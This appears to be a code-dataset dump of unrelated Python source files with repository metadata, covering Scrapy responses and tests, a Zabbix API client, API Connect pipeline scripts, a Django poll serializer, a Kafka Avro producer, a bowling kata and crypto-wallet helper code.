def replace(self, *args, **kwargs):
"""Create a new Response with the same attributes except for those
given new values.
"""
for x in ['url', 'status', 'headers', 'body', 'request', 'flags']:
kwargs.setdefault(x, getattr(self, x))
cls = kwargs.pop('cls', self.__class__)
return cls(*args, **kwargs)
def urljoin(self, url):
"""Join this Response's url with a possible relative url to form an
absolute interpretation of the latter."""
return urljoin(self.url, url)
@property
def text(self):
"""For subclasses of TextResponse, this will return the body
as text (unicode object in Python 2 and str in Python 3)
"""
raise AttributeError("Response content isn't text")
def css(self, *a, **kw):
"""Shortcut method implemented only by responses whose content
is text (subclasses of TextResponse).
"""
raise NotSupported("Response content isn't text")
def xpath(self, *a, **kw):
"""Shortcut method implemented only by responses whose content
is text (subclasses of TextResponse).
"""
raise NotSupported("Response content isn't text")
def follow(self, url, callback=None, method='GET', headers=None, body=None,
cookies=None, meta=None, encoding='utf-8', priority=0,
dont_filter=False, errback=None):
# type: (...) -> Request
"""
Return a :class:`~.Request` instance to follow a link ``url``.
It accepts the same arguments as ``Request.__init__`` method,
but ``url`` can be a relative URL or a ``scrapy.link.Link`` object,
not only an absolute URL.
:class:`~.TextResponse` provides a :meth:`~.TextResponse.follow`
method which supports selectors in addition to absolute/relative URLs
and Link objects.
"""
if isinstance(url, Link):
url = url.url
url = self.urljoin(url)
return Request(url, callback,
method=method,
headers=headers,
body=body,
cookies=cookies,
meta=meta,
encoding=encoding,
priority=priority,
dont_filter=dont_filter,
errback=errback)
```
#### File: scrapy/tests/test_dupefilters.py
```python
import hashlib
import tempfile
import unittest
import shutil
from scrapy.dupefilters import RFPDupeFilter
from scrapy.http import Request
from scrapy.utils.python import to_bytes
class RFPDupeFilterTest(unittest.TestCase):
def test_filter(self):
dupefilter = RFPDupeFilter()
dupefilter.open()
r1 = Request('http://scrapytest.org/1')
r2 = Request('http://scrapytest.org/2')
r3 = Request('http://scrapytest.org/2')
assert not dupefilter.request_seen(r1)
assert dupefilter.request_seen(r1)
assert not dupefilter.request_seen(r2)
assert dupefilter.request_seen(r3)
dupefilter.close('finished')
def test_dupefilter_path(self):
r1 = Request('http://scrapytest.org/1')
r2 = Request('http://scrapytest.org/2')
path = tempfile.mkdtemp()
try:
df = RFPDupeFilter(path)
df.open()
assert not df.request_seen(r1)
assert df.request_seen(r1)
df.close('finished')
df2 = RFPDupeFilter(path)
df2.open()
assert df2.request_seen(r1)
assert not df2.request_seen(r2)
assert df2.request_seen(r2)
df2.close('finished')
finally:
shutil.rmtree(path)
def test_request_fingerprint(self):
"""Test if customization of request_fingerprint method will change
output of request_seen.
"""
r1 = Request('http://scrapytest.org/index.html')
r2 = Request('http://scrapytest.org/INDEX.html')
dupefilter = RFPDupeFilter()
dupefilter.open()
assert not dupefilter.request_seen(r1)
assert not dupefilter.request_seen(r2)
dupefilter.close('finished')
class CaseInsensitiveRFPDupeFilter(RFPDupeFilter):
def request_fingerprint(self, request):
fp = hashlib.sha1()
fp.update(to_bytes(request.url.lower()))
return fp.hexdigest()
case_insensitive_dupefilter = CaseInsensitiveRFPDupeFilter()
case_insensitive_dupefilter.open()
assert not case_insensitive_dupefilter.request_seen(r1)
assert case_insensitive_dupefilter.request_seen(r2)
case_insensitive_dupefilter.close('finished')
```
|
{
"source": "jesuslosada/zabbix-client",
"score": 2
}
|
#### File: zabbix-client/zabbix_client/api_wrapper.py
```python
import logging
import json
import string
import socket
try:
from urllib.request import Request, build_opener
except ImportError:
# Python 2
from urllib2 import Request, build_opener
try:
from urllib.error import URLError, HTTPError as _HTTPError
except ImportError:
# Python 2
from urllib2 import URLError, HTTPError as _HTTPError
try:
from io import BytesIO
except ImportError:
# Python 2
try:
# C implementation
from cStringIO import StringIO as BytesIO
except ImportError:
# Python implementation
from StringIO import StringIO as BytesIO
try:
import gzip
except ImportError:
# Python can be built without zlib/gzip support
gzip = None
try:
import requests
except ImportError:
requests = None
from . import __version__
from .exceptions import (
ZabbixClientError, TransportError, TimeoutError, HTTPError, ResponseError,
ContentDecodingError, InvalidJSONError, JSONRPCError
)
# Default network timeout (in seconds)
DEFAULT_TIMEOUT = 30
logger = logging.getLogger(__name__)
def dumps(id_, method, params=None, auth=None):
rpc_request = {
'jsonrpc': '2.0',
'id': id_,
'method': method
}
if params is not None:
rpc_request['params'] = params
else:
# Zabbix 3 and later versions fail if 'params' is omitted
rpc_request['params'] = {}
if auth is not None:
rpc_request['auth'] = auth
dump = json.dumps(rpc_request, separators=(',', ':')).encode('utf-8')
if logger.isEnabledFor(logging.INFO):
json_str = json.dumps(rpc_request, sort_keys=True)
logger.info("JSON-RPC request: {0}".format(json_str))
return dump
def loads(response):
try:
rpc_response = json.loads(response.decode('utf-8'))
except ValueError as e:
raise InvalidJSONError(e)
if not isinstance(rpc_response, dict):
raise ResponseError('Response is not a dict')
if 'jsonrpc' not in rpc_response or rpc_response['jsonrpc'] != '2.0':
raise ResponseError('JSON-RPC version not supported')
if 'error' in rpc_response:
error = rpc_response['error']
if 'code' not in error or 'message' not in error:
raise ResponseError('Invalid JSON-RPC error object')
code = error['code']
message = error['message']
# 'data' may be omitted
data = error.get('data', None)
if data is None:
exception_message = 'Code: {0}, Message: {1}'.format(code, message)
else:
exception_message = ('Code: {0}, Message: {1}, ' +
'Data: {2}').format(code, message, data)
raise JSONRPCError(exception_message, code=code, message=message,
data=data)
if 'result' not in rpc_response:
raise ResponseError('Response does not contain a result object')
if logger.isEnabledFor(logging.INFO):
json_str = json.dumps(rpc_response, sort_keys=True)
logger.info("JSON-RPC response: {0}".format(json_str))
return rpc_response
class ZabbixServerProxy(object):
def __init__(self, url, transport=None):
self.url = url if not url.endswith('/') else url[:-1]
self.url += '/api_jsonrpc.php'
logger.debug("Zabbix server URL: {0}".format(self.url))
if transport is not None:
self.transport = transport
else:
if requests:
logger.debug("Using requests as transport layer")
self.transport = RequestsTransport()
else:
logger.debug("Using urllib libraries as transport layer")
self.transport = UrllibTransport()
self._request_id = 0
self._auth_token = None
self._method_hooks = {
'apiinfo.version': self._no_auth_method,
'user.login': self._login,
'user.authenticate': self._login, # deprecated alias of user.login
'user.logout': self._logout
}
def __getattr__(self, name):
return ZabbixObject(name, self)
def call(self, method, params=None):
method_lower = method.lower()
if method_lower in self._method_hooks:
return self._method_hooks[method_lower](method, params=params)
return self._call(method, params=params, auth=self._auth_token)
def _call(self, method, params=None, auth=None):
self._request_id += 1
rpc_request = dumps(self._request_id, method, params=params, auth=auth)
content = self.transport.request(self.url, rpc_request)
rpc_response = loads(content)
return rpc_response['result']
def _no_auth_method(self, method, params=None):
return self._call(method, params=params)
def _login(self, method, params=None):
self._auth_token = None
# Save the new token if the request is successful
self._auth_token = self._call(method, params=params)
return self._auth_token
def _logout(self, method, params=None):
try:
result = self._call(method, params=params, auth=self._auth_token)
except ZabbixClientError:
raise
finally:
self._auth_token = None
return result
class ZabbixObject(object):
def __init__(self, name, server_proxy):
self.name = name
self.server_proxy = server_proxy
def __getattr__(self, name):
def call_wrapper(*args, **kwargs):
if args and kwargs:
raise ValueError('JSON-RPC 2.0 does not allow both ' +
'positional and keyword arguments')
method = '{0}.{1}'.format(self.name, name)
params = args or kwargs or None
return self.server_proxy.call(method, params=params)
# Little hack to avoid clashes with reserved keywords.
# Example: use configuration.import_() to call configuration.import()
if name.endswith('_'):
name = name[:-1]
return call_wrapper
class Transport(object):
def __init__(self, timeout=DEFAULT_TIMEOUT):
self.timeout = timeout
def request(self, url, rpc_request):
raise NotImplementedError
@staticmethod
def _add_headers(headers):
# Set the JSON-RPC headers
json_rpc_headers = {
'Content-Type': 'application/json',
'Accept': 'application/json'
}
headers.update(json_rpc_headers)
# If no custom header exists, set the default user-agent
if 'User-Agent' not in headers:
headers['User-Agent'] = 'zabbix-client/{0}'.format(__version__)
class RequestsTransport(Transport):
def __init__(self, *args, **kwargs):
if not requests:
raise ValueError('requests is not available')
self.session = kwargs.pop('session', None)
super(RequestsTransport, self).__init__(*args, **kwargs)
if self.session is None:
self.session = requests.Session()
# Delete default requests' user-agent
self.session.headers.pop('User-Agent', None)
self._add_headers(self.session.headers)
def request(self, url, rpc_request):
try:
response = self.session.post(url, data=rpc_request,
timeout=self.timeout)
response.raise_for_status()
content = response.content
except requests.Timeout as e:
raise TimeoutError(e)
except requests.exceptions.ContentDecodingError as e:
raise ContentDecodingError(e)
except requests.HTTPError as e:
raise HTTPError(e)
except requests.RequestException as e:
raise TransportError(e)
return content
class UrllibTransport(Transport):
def __init__(self, *args, **kwargs):
self.accept_gzip_encoding = kwargs.pop('accept_gzip_encoding', True)
headers = kwargs.pop('headers', None)
super(UrllibTransport, self).__init__(*args, **kwargs)
self.headers = {}
if headers:
for key, value in headers.items():
self.headers[string.capwords(key, '-')] = value
self._add_headers(self.headers)
if self.accept_gzip_encoding and gzip:
self.headers['Accept-Encoding'] = 'gzip'
self._opener = build_opener()
def request(self, url, rpc_request):
request = Request(url, data=rpc_request, headers=self.headers)
try:
response = self._opener.open(request, timeout=self.timeout)
content = response.read()
except _HTTPError as e:
raise HTTPError(e)
except URLError as e:
if isinstance(e.reason, socket.timeout):
raise TimeoutError(e)
else:
raise TransportError(e)
except socket.timeout as e:
raise TimeoutError(e)
encoding = response.info().get('Content-Encoding', '').lower()
if encoding in ('gzip', 'x-gzip'):
if not gzip:
raise ValueError('gzip is not available')
b = BytesIO(content)
try:
content = gzip.GzipFile(mode='rb', fileobj=b).read()
except IOError as e:
raise ContentDecodingError(e)
return content
```
|
{
"source": "jesuslou/LouEngine",
"score": 2
}
|
#### File: tools/scripts/LicenseHeaderIncluder.py
```python
import argparse
import os
license = """////////////////////////////////////////////////////////////
//
// LouEngine - Multiplatform Game Engine Project
// Copyright (C) 2016-2017 <NAME> (<EMAIL>)
//
// This software is provided 'as-is', without any express or implied warranty.
// In no event will the authors be held liable for any damages arising from the use of this software.
//
// Permission is granted to anyone to use this software for any purpose,
// including commercial applications, and to alter it and redistribute it freely,
// subject to the following restrictions:
//
// 1. The origin of this software must not be misrepresented;
// you must not claim that you wrote the original software.
// If you use this software in a product, an acknowledgment
// in the product documentation would be appreciated but is not required.
//
// 2. Altered source versions must be plainly marked as such,
// and must not be misrepresented as being the original software.
//
// 3. This notice may not be removed or altered from any source distribution.
//
////////////////////////////////////////////////////////////
"""
def path_to_os(path):
full_path = os.path.abspath(path)
parts = full_path.split("/")
return os.path.sep.join(parts)
def read_parameters():
parser = argparse.ArgumentParser()
parser.add_argument('-p', '--paths', required=True, nargs='+', help='Paths to look for files to add license')
args = parser.parse_args()
return args.paths
def add_license(filename, lines):
print("Adding missing license to {}".format(filename))
new_file_content = []
new_file_content.append(license)
new_file_content.extend(lines)
with open(filename, "w") as file:
for line in new_file_content:
file.write(line)
def process_file(filename):
lines = []
with open(filename, "r") as file:
lines = file.readlines()
if '////////////////////////////////////////////////////////////' not in lines[0]:
add_license(filename, lines)
def include_license_for_path(path):
for root, dirs, files in os.walk(path, topdown=False):
for name in files:
filename = os.path.join(root, name)
if ".h" in filename or ".cpp" in filename:
process_file(filename)
def include_license(paths):
for path in paths:
path = path_to_os(path)
if os.path.isdir(path):
include_license_for_path(path)
else:
print("Invalid path! {} is not a valid folder".format(path))
if __name__ == '__main__':
paths = read_parameters()
include_license(paths)
```
|
{
"source": "jesusmah/apic-publish-pipeline",
"score": 2
}
|
#### File: apic-publish-pipeline/scripts/Audit_res.py
```python
import os
import json
FILE_NAME = "Audit_res.py"
AUDIT_FILENAME = "apic-pipeline-audit.json"
def write_to_file(ENV_LOCAL_TARGET_DIR, fileContent):
with open(ENV_LOCAL_TARGET_DIR + "/" + AUDIT_FILENAME,"w+") as f:
f.write(json.dumps(fileContent))
def readfile_myAudit(ENV_LOCAL_TARGET_DIR):
myAudit = None
if os.path.isfile(ENV_LOCAL_TARGET_DIR + "/" + AUDIT_FILENAME):
with open(ENV_LOCAL_TARGET_DIR + "/" + AUDIT_FILENAME) as f:
myAudit = json.load(f)
else:
myAudit = {}
return myAudit
def update_stage_res(ENV_LOCAL_TARGET_DIR, stage_name, stage_res):
myAudit = readfile_myAudit(ENV_LOCAL_TARGET_DIR)
if "STAGE_SUMMARY" in myAudit.keys():
if stage_name in myAudit["STAGE_SUMMARY"]:
myAudit["STAGE_SUMMARY"][stage_name]["Result"] = stage_res
else:
temp = {"Result" : stage_res}
myAudit["STAGE_SUMMARY"][stage_name] = temp
else:
temp = {stage_name : {"Result" : stage_res}}
myAudit["STAGE_SUMMARY"] = temp
write_to_file(ENV_LOCAL_TARGET_DIR, myAudit)
def update_product_download_audit(ENV_LOCAL_TARGET_DIR, product_download_audit):
myAudit = readfile_myAudit(ENV_LOCAL_TARGET_DIR)
for key,value in product_download_audit.items():
dyfg = {"Download_Yaml_From_Git" : value}
if "Products" in myAudit.keys():
if key in myAudit["Products"]:
myAudit["Products"][key]["Download_Yaml_From_Git"] = value
else:
myAudit["Products"][key] = dyfg
else:
myAudit["Products"] = {key: dyfg}
write_to_file(ENV_LOCAL_TARGET_DIR, myAudit)
def update_api_download_audit(ENV_LOCAL_TARGET_DIR, api_download_audit):
myAudit = readfile_myAudit(ENV_LOCAL_TARGET_DIR)
for key,value in api_download_audit.items():
dyfg = {"Download_Yaml_From_Git" : value}
if "APIs" in myAudit.keys():
if key in myAudit["APIs"]:
myAudit["APIs"][key]["Download_Yaml_From_Git"] = value
else:
myAudit["APIs"][key] = dyfg
else:
myAudit["APIs"] = {key: dyfg}
write_to_file(ENV_LOCAL_TARGET_DIR, myAudit)
def update_apic_publish_audit(ENV_LOCAL_TARGET_DIR, apic_publish_audit):
myAudit = readfile_myAudit(ENV_LOCAL_TARGET_DIR)
for key,value in apic_publish_audit.items():
key = key.replace(".yaml", "")
temp = {"Publish" : value}
if "Products" in myAudit.keys():
if key in myAudit["Products"]:
myAudit["Products"][key]["Publish"] = value
else:
myAudit["Products"][key] = temp
else:
myAudit["Products"] = {key: temp}
write_to_file(ENV_LOCAL_TARGET_DIR, myAudit)
def update_test_apis_audit(ENV_LOCAL_TARGET_DIR, test_apis_audit):
myAudit = readfile_myAudit(ENV_LOCAL_TARGET_DIR)
for key,value in test_apis_audit.items():
temp = {"Test_Result" : value}
if "APIs" in myAudit.keys():
if key in myAudit["APIs"]:
myAudit["APIs"][key]["Test_Result"] = value
else:
myAudit["APIs"][key] = temp
else:
myAudit["APIs"] = {key: temp}
write_to_file(ENV_LOCAL_TARGET_DIR, myAudit)
```
#### File: apic-publish-pipeline/scripts/parse_api_yaml_get_basepath.py
```python
import yaml
import glob
import os
def get_basepath_from_api(target_dir):
yamlFiles=glob.glob(target_dir + "/*.yaml")
var_api_basepath_list = {}
for ymlFile in yamlFiles:
with open(ymlFile) as f:
# use safe_load instead load
dataMap = yaml.safe_load(f)
if "basePath" in dataMap:
var_api_name = os.path.basename(ymlFile).replace(".yaml","")
var_api_basepath_list[var_api_name] = dataMap['basePath']
return var_api_basepath_list
```
#### File: apic-publish-pipeline/scripts/print_audit.py
```python
import json
AUDIT_FILENAME = "apic-pipeline-audit.json"
FILE_NAME = "print_audit.py"
INFO = "[INFO]["+ FILE_NAME +"] - "
WORKING_DIR_BASIC = "../WORKSPACE"
def orchestrate():
try:
with open(WORKING_DIR_BASIC + "/" + AUDIT_FILENAME,'r') as f:
data = f.read()
data_json = json.loads(data)
print(INFO + "AUDIT")
print(INFO + "-----")
print(json.dumps(data_json, indent=4, sort_keys=False))
except Exception as e:
raise Exception("[ERROR] - Exception in " + FILE_NAME + ": " + repr(e))
orchestrate()
```
|
{
"source": "jesusmaherrera/django-nuxtjs",
"score": 2
}
|
#### File: core/serializers/question.py
```python
from rest_framework.serializers import CurrentUserDefault, HiddenField, ModelSerializer
from backend.core.models import Choice, Question
from .choice import ChoiceSerializer
class QuestionSerializer(ModelSerializer):
owner = HiddenField(default=CurrentUserDefault())
choices = ChoiceSerializer(many=True)
class Meta:
model = Question
fields = ["id", "text", "creation_date",
"start_date", "end_date", "choices", "owner"]
def create(self, validated_data):
choices = validated_data.pop("choices")
question = Question.objects.create(**validated_data)
for choice in choices:
Choice.objects.create(question=question, **choice)
return question
def update(self, instance, validated_data):
choices = validated_data.pop("choices")
instance.text = validated_data.get("text", instance.text)
instance.start_date = validated_data.get(
"start_date", instance.start_date)
instance.end_date = validated_data.get("end_date", instance.end_date)
instance.save()
keep_choices = []
for choice in choices:
if "id" in choice.keys():
if Choice.objects.filter(id=choice["id"]).exists():
c = Choice.objects.get(id=choice["id"])
c.text = choice.get("text", c.text)
c.save()
keep_choices.append(c.id)
else:
continue
else:
c = Choice.objects.create(question=instance, **choice)
keep_choices.append(c.id)
for choice in instance.choices.all():
if choice.id not in keep_choices:
choice.delete()
return instance
```
#### File: core/views/question.py
```python
from rest_framework import status, viewsets
from rest_framework.decorators import action
from rest_framework.response import Response
from backend.core.models import Question
from backend.core.serializers import QuestionSerializer
class QuestionViewSet(viewsets.ModelViewSet):
queryset = Question.objects.all()
serializer_class = QuestionSerializer
@action(detail=False, url_path="current", methods=["GET"])
def current_pools(self, request):
questions = Question.active.all()
serializer = self.get_serializer(questions, many=True)
return Response(serializer.data, status=status.HTTP_200_OK)
@action(detail=False, url_path="closed", methods=["GET"])
def closed_pools(self, request):
questions = Question.closed.all()
serializer = self.get_serializer(questions, many=True)
return Response(serializer.data, status=status.HTTP_200_OK)
```
|
{
"source": "jesusmah/vaccine-order-mgr-pg",
"score": 2
}
|
#### File: e2e/kafka/KafkaAvroProducer.py
```python
import json,os
from confluent_kafka import KafkaError
from confluent_kafka import SerializingProducer
from confluent_kafka.serialization import StringSerializer
from confluent_kafka.schema_registry import SchemaRegistryClient
from confluent_kafka.schema_registry.avro import AvroSerializer
import kafka.KafkaConfig as config
class KafkaAvroProducer:
def __init__(self, producer_name, value_schema, groupID = 'KafkaAvroProducer',
kafka_brokers = "",
kafka_user = "",
kafka_pwd = "",
kafka_cacert = "",
kafka_sasl_mechanism = "",
topic_name = ""):
self.kafka_brokers = kafka_brokers
self.kafka_user = kafka_user
self.kafka_pwd = <PASSWORD>
self.kafka_sasl_mechanism = kafka_sasl_mechanism
self.kafka_cacert = kafka_cacert
self.topic_name = topic_name
# Consumer name for logging purposes
self.logging_prefix = '['+ producer_name + '][KafkaAvroProducer]'
# Schema Registry configuration
self.schema_registry_conf = {'url': config.SCHEMA_REGISTRY_URL}
# Schema Registry Client
self.schema_registry_client = SchemaRegistryClient(self.schema_registry_conf)
# String Serializer for the key
self.key_serializer = StringSerializer('utf_8')
# Avro Serializer for the value
print(value_schema)
print(type(value_schema))
value_schema=value_schema.strip()
self.value_serializer = AvroSerializer(value_schema, self.schema_registry_client)
# Get the producer configuration
self.producer_conf = self.getProducerConfiguration(groupID,
self.key_serializer,
self.value_serializer)
# Create the producer
self.producer = SerializingProducer(self.producer_conf)
def delivery_report(self,err, msg):
""" Called once for each message produced to indicate delivery result. Triggered by poll() or flush(). """
if err is not None:
print('[KafkaAvroProducer] - [ERROR] - Message delivery failed: {}'.format(err))
else:
print('[KafkaAvroProducer] - Message delivered to {} [{}]'.format(msg.topic(), msg.partition()))
def publishEvent(self, key, value, topicName = 'kafka-avro-producer'):
# Produce the Avro message
self.producer.produce(topic=topicName,value=value,key=key, on_delivery=self.delivery_report)
# Flush
self.producer.flush()
def getProducerConfiguration(self,groupID,key_serializer,value_serializer):
try:
options ={
'bootstrap.servers': os.environ['KAFKA_BROKERS'],
'group.id': groupID,
'key.serializer': key_serializer,
'value.serializer': value_serializer
}
if (os.getenv('KAFKA_PASSWORD','') != ''):
# Set security protocol common to ES on prem and on IBM Cloud
options['security.protocol'] = 'SASL_SSL'
# Depending on the Kafka User, we will know whether we are talking to ES on prem or on IBM Cloud
# If we are connecting to ES on IBM Cloud, the SASL mechanism is plain
if (os.getenv('KAFKA_USER','') == 'token'):
options['sasl.mechanisms'] = 'PLAIN'
# If we are connecting to ES on OCP, the SASL mechanism is scram-sha-512
else:
options['sasl.mechanisms'] = 'SCRAM-SHA-512'
# Set the SASL username and password
options['sasl.username'] = os.getenv('KAFKA_USER','')
options['sasl.password'] = os.getenv('KAFKA_PASSWORD','')
# If we are talking to ES on prem, it uses an SSL self-signed certificate.
# Therefore, we need the CA public certificate for the SSL connection to happen.
if (os.path.isfile(os.getenv('KAFKA_CERT','/certs/es-cert.pem'))):
options['ssl.ca.location'] = os.getenv('KAFKA_CERT','/certs/es-cert.pem')
return options
except KeyError as error:
print('[KafkaAvroProducer] - [ERROR] - A required environment variable does not exist: ' + error)
return {}
```
|
{
"source": "jesusmgg/jesus_management",
"score": 2
}
|
#### File: jesus_management/accounting/models.py
```python
from decimal import Decimal
from django.db import models
from django.utils import timezone
####################################################################
# TAXES
####################################################################
class Tax(models.Model):
name = models.CharField(max_length=30)
rate = models.DecimalField(default=10.0, decimal_places=2, max_digits=15)
def __str__(self):
return self.name
class Meta:
verbose_name_plural = 'Taxes'
####################################################################
####################################################################
# RECORDS
####################################################################
class Record(models.Model):
date = models.DateField(default=timezone.now)
class RecordItem(models.Model):
description = models.CharField(max_length=200)
ammount = models.DecimalField(default=0.0, decimal_places=2, max_digits=15)
tax = models.ManyToManyField(Tax)
record = models.ForeignKey(Record, on_delete=models.CASCADE)
class Income(Record):
pass
class Expense(Record):
pass
####################################################################
```
|
{
"source": "jesusmgg/jesusmg.net",
"score": 2
}
|
#### File: jesusmg.net/blog/models.py
```python
from django.contrib.auth.models import User
from django.db import models
from ckeditor_uploader.fields import RichTextUploadingField
from django.template import defaultfilters
from django.urls import reverse
class Category(models.Model):
name = models.CharField(max_length=100)
def __str__(self):
return self.name
class Meta:
verbose_name_plural = 'categories'
class Post(models.Model):
date = models.DateField(auto_now_add=True)
title = models.CharField(max_length=50)
slug = models.SlugField(max_length=100, blank=True)
author = models.ForeignKey(User)
category = models.ForeignKey(Category, on_delete=models.PROTECT)
preview_image = models.ImageField(upload_to='blog/preview_image/', blank=True, null=True)
content = RichTextUploadingField()
published = models.BooleanField(default=False)
def save(self, *args, **kwargs):
self.slug = defaultfilters.slugify(self.title)
super(Post, self).save(*args, **kwargs)
def get_absolute_url(self):
return reverse('post', kwargs={'slug': self.slug, 'id': self.id})
def __str__(self):
return self.title
class Meta:
verbose_name_plural = 'posts'
```
|
{
"source": "jesusmiguelgarcia/FSTmikes",
"score": 3
}
|
#### File: feature_space_tree/attributes/cliente_freeling_mk.py
```python
import re, string
import nltk
from sys import stderr, version
import socket
import sys
# Codigo de Mike apoyado en pynlpl
#regresar lemas, tags , tuplas (texto , lema, tag)
#uso con regexp que separa
#regexp = "[a-zA-Z'ÁÉÍÓÚáéíóúñÑüÜ]+-*[a-zA-Z'ÁÉÍÓÚáéíóúñÑüÜ]+|[a-zA-Z'ÁÉÍÓÚáéíóúñÑüÜ]+|[.]+|[/,$?:;!()&%#=+{}*~.]+"
#linex = "Mary año tiene un borrego acasffss. es una causa perdida. Los niños juegan."
#line = " Los niños juegan. La propuesta se distingue por incorporar la representación de la experiencia en el modelo del estudiante. Generalmente, las aplicaciones afines se concentran en representar el conocimiento adquirido por el estudiante GRUNDY (Rich, 1979), sus atributos personales Smex Web (Albrecht et al., 2000), conductas observadas ELM-PE (Brusilovsky, 1995b), distorsiones en el aprendizaje Modelos de Diagnóstico (Brown y Burton, 1978) y el conocimiento de enseñanza ADAPS (Brusilovsky y Cooper, 1999). En cambio, en el presente trabajo los atributos de la experiencia forman parte del propio modelo del estudiante. Como resultado, se obtiene una representación más rica del fenómeno de estudio, puesto que se consideran a dos protagonistas: el emisor y el receptor del conocimiento que se transmite y adquiere."
#words, postags, lemmas, tuplas = POS_freeling(linex, regexp)
#print tuplas
def u(s, encoding = 'utf-8', errors='strict'):
#ensure s is properly unicode.. wrapper for python 2.6/2.7,
if version < '3':
#ensure the object is unicode
if isinstance(s, unicode):
return s
else:
return unicode(s, encoding,errors=errors)
else:
#will work on byte arrays
if isinstance(s, str):
return s
else:
return str(s,encoding,errors=errors)
def b(s):
#ensure s is bytestring
if version < '3':
#ensure the object is unicode
if isinstance(s, str):
return s
else:
return s.encode('utf-8')
else:
#will work on byte arrays
if isinstance(s, bytes):
return s
else:
return s.encode('utf-8')
def POS_freeling(texto, regexp):
#preprocesado para pasar una lista con las palabras
# se podria pasar despues del posfilter ya que ahi se tienen las palabras en
# una lista
host = "localhost"
port = 50005
debug=True
tokens = nltk.regexp_tokenize(texto, regexp)
texto_s= " ".join(tokens)
sourcewords_s = texto_s
sourcewords = tokens
encoding='utf-8'
timeout=120.0
host = "localhost"
port = 50005
BUFSIZE = 10240
socketx = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
socketx.settimeout(timeout)
socketx.connect( (host,int(port)) )
socketx.sendall('RESET_STATS\0')
r = socketx.recv(BUFSIZE)
if not r.strip('\0') == 'FL-SERVER-READY':
raise Exception("Server not ready")
# else:
# print "server listo"
#se toma lista separada por espacios
socketx.sendall( b(sourcewords_s) +'\n\0') #funciona con str no con UTF ojo
#print "Sent:",line2s,file=sys.stderr
debug = False
results = []
done = False
while not done:
data = b""
while not data:
buffer = socketx.recv(BUFSIZE)
#print("Buffer: ["+repr(buffer)+"]")
#print buffer
if buffer[-1] == '\0':
data += buffer[:-1]
done = True
break
else:
data += buffer
#print data
data = u(data,encoding) #combierte a utf-8
#if debug: print("Received:",data)
for i, line in enumerate(data.strip(' \t\0\r\n').split('\n')):
if not line.strip():
done = True
break
else:
cols = line.split(" ")
subwords = cols[0].lower().split("_")
if len(cols) > 2: #this seems a bit odd?
for word in subwords: #split multiword expressions
results.append( (word, cols[1], cols[2], i, len(subwords) > 1 ) ) #word, lemma, pos, index, multiword?
#print results
if debug: print("Received:",results)
words = []
postags = []
lemmas = []
for fields in results:
word, lemma,pos = fields[:3]
words.append(word)
postags.append(pos)
lemmas.append(lemma)
#print lemmas,"\n", postags,"\n" , words
return words, postags, lemmas, results
#---------------------------------------------------------
#words = line.strip().split(' ') # se debe pasar como lista o separado por espacios
# se lo puedo pasar por lineas o simplemente una cadena separada por espacios
# recibe o lista o texto simplemente separado por espacios o bien como lista
# 3 opciones
#uso de freeling para lemas y tags
# # #
# regexp = "[a-zA-Z'ÁÉÍÓÚáéíóúñÑüÜ]+-*[a-zA-Z'ÁÉÍÓÚáéíóúñÑüÜ]+|[a-zA-Z'ÁÉÍÓÚáéíóúñÑüÜ]+|[.]+|[/,$?:;!()&%#=+{}*~.]+"
#
# linex = "Mary año tiene un borrego acasffss. es una causa perdida. Los niños juegan."
# line = " Los niños juegan. La propuesta se distingue por incorporar la representación de la experiencia en el modelo del estudiante. Generalmente, las aplicaciones afines se concentran en representar el conocimiento adquirido por el estudiante GRUNDY (Rich, 1979), sus atributos personales Smex Web (Albrecht et al., 2000), conductas observadas ELM-PE (Brusilovsky, 1995b), distorsiones en el aprendizaje Modelos de Diagnóstico (Brown y Burton, 1978) y el conocimiento de enseñanza ADAPS (Brusilovsky y Cooper, 1999). En cambio, en el presente trabajo los atributos de la experiencia forman parte del propio modelo del estudiante. Como resultado, se obtiene una representación más rica del fenómeno de estudio, puesto que se consideran a dos protagonistas: el emisor y el receptor del conocimiento que se transmite y adquiere."
# words, postags, lemmas, tuplas = POS_freeling(linex, regexp)
#
# print tuplas
#
# #parte de POS
# sufix_tag = []
# for i in range(len(postags)):
# print postags[i]
# if len(postags[i])>4:
# sufix_tag.append(postags[i][0:4])
# else:
# sufix_tag.append(postags[i])
#
# print sufix_tag
# #
```
|
{
"source": "JesusMtnez/devexperto-challenge",
"score": 4
}
|
#### File: kata/tests/test_game.py
```python
import unittest
from game import Game
class BowlingGameTest(unittest.TestCase):
def setUp(self):
self.g = Game()
def tearDown(self):
self.g = None
def _roll_many(self, n, pins):
"Roll 'n' times a roll of 'pins' pins"
for i in range(n):
self.g.roll(pins)
def _roll_spare(self):
"Roll a spare"
self.g.roll(5)
self.g.roll(5)
def _roll_strike(self):
"Roll a strike"
self.g.roll(10)
def test_gutter_game(self):
self._roll_many(20, 0)
self.assertEqual(0, self.g.score())
def test_all_ones(self):
self._roll_many(20, 1)
self.assertEqual(20, self.g.score())
def test_one_spare(self):
self._roll_spare()
self.g.roll(3)
self._roll_many(17, 0)
self.assertEqual(16, self.g.score())
def test_one_strike(self):
self._roll_strike()
self.g.roll(3)
self.g.roll(4)
self._roll_many(16, 0)
self.assertEqual(24, self.g.score())
def test_perfect_game(self):
self._roll_many(12, 10)
self.assertEqual(300, self.g.score())
if __name__ == '__main__':
unittest.main()
```
|
{
"source": "Jesusown/electrum",
"score": 2
}
|
#### File: plugins/keepkey/client.py
```python
from keepkeylib.client import proto, BaseClient, ProtocolMixin
from .clientbase import KeepKeyClientBase
class KeepKeyClient(KeepKeyClientBase, ProtocolMixin, BaseClient):
def __init__(self, transport, handler, plugin):
BaseClient.__init__(self, transport)
ProtocolMixin.__init__(self, transport)
KeepKeyClientBase.__init__(self, handler, plugin, proto)
def recovery_device(self, *args):
ProtocolMixin.recovery_device(self, False, *args)
KeepKeyClientBase.wrap_methods(KeepKeyClient)
```
#### File: plugins/revealer/hmac_drbg.py
```python
import hashlib
import hmac
class DRBG(object):
def __init__(self, seed):
self.key = b'\x00' * 64
self.val = b'\x01' * 64
self.reseed(seed)
def hmac(self, key, val):
return hmac.new(key, val, hashlib.sha512).digest()
def reseed(self, data=b''):
self.key = self.hmac(self.key, self.val + b'\x00' + data)
self.val = self.hmac(self.key, self.val)
if data:
self.key = self.hmac(self.key, self.val + b'\x01' + data)
self.val = self.hmac(self.key, self.val)
def generate(self, n):
xs = b''
while len(xs) < n:
self.val = self.hmac(self.key, self.val)
xs += self.val
self.reseed()
return xs[:n]
```
|
{
"source": "jesuspabloalfaro/Find4J",
"score": 3
}
|
#### File: jesuspabloalfaro/Find4J/Find4JModule.py
```python
import csv
import sys
